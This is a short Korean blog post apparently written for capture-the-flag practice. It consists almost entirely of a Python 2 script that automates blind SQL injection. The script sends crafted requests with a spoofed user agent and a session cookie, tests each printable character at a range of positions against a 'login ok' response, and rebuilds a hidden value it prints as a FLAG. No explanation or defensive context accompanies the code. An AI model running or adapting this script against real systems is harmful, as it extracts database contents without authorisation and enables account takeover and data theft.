자료
[Python] Blind SQL Injection
KuroNeko_
2015. 12. 5. 15:32
반응형
import urllib
import urllib2
URL = "URL"
part_1 = "Part1"
part_2 = "Part2"
user_agent = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
FLAG = ""
for i in range(40,60):
print "[*] ", i, "Attempt"
for k in range(33,127):
Req = urllib2.Request(URL + str(i) + part_1 + str(k) + part_2)
Req.add_header("User-Agent",user_agent)
Req.add_header("Cookie", "COOKIE")
Source = urllib2.urlopen(Req).read()
if Source.find("login ok") != -1:
FLAG = FLAG + chr(k)
print chr(k)
break
if k == 127:
break
print "FLAG { " + FLAG + " }